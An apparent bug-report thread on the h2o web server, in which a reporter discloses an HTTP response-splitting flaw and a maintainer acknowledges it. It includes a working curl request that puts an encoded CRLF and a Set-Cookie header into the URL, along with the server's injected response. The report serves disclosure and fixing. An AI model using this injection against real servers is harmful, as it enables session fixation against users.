HTTP response splitting

[nanorc]

Hi,

I found out that i can do HTTP response splitting in h2o by feeding the URL with carriage return
and new line (CRLF). Example:

$ curl -I "http://fooexample.com/en/%0d%0aset-cookie:test=test"

HTTP/1.1 301 Redirected
Date: Thu, 07 Jan 2016 08:56:34 GMT
Server: h2o/1.6.0
Connection: keep-alive
location: https://fooexample.com/en/
set-cookie:test=test
content-type: text/html; charset=utf-8

the h2o config:

hosts:
    "fooexample.com":
        listen:
            port: 80
        paths:
            "/":
                redirect:
                    status: 301
                    url: https://fooexample.com/
    "fooexample.com":
        listen:
            port: 443
            ssl:
                certificate-file: /path/to/fooexample.crt
                key-file:         /path/to/fooexample.key

This issue could lead to session fixation attack where an attacker could coerce a victim
into clicking a link with an injected predefined cookie

[kazuho]

Thank you for reporting the issue. Looking into it.

[nanorc]

thanks @kazuho